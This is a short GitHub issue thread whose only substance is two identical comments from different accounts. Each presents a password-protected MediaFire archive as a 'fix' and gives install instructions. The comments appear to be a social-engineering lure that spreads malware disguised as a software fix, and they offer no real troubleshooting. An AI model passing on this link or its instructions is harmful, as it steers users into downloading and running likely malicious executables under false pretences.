### ISSUE TITLE
Criar merge 

### ISSUE THREAD

**Issue by MMONSTER124** [actions/runner-images#10504]
https://github.com/binance/binance-connector-python/actions/runs/10091700269/job/27903783319

**Comment by li371359001** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
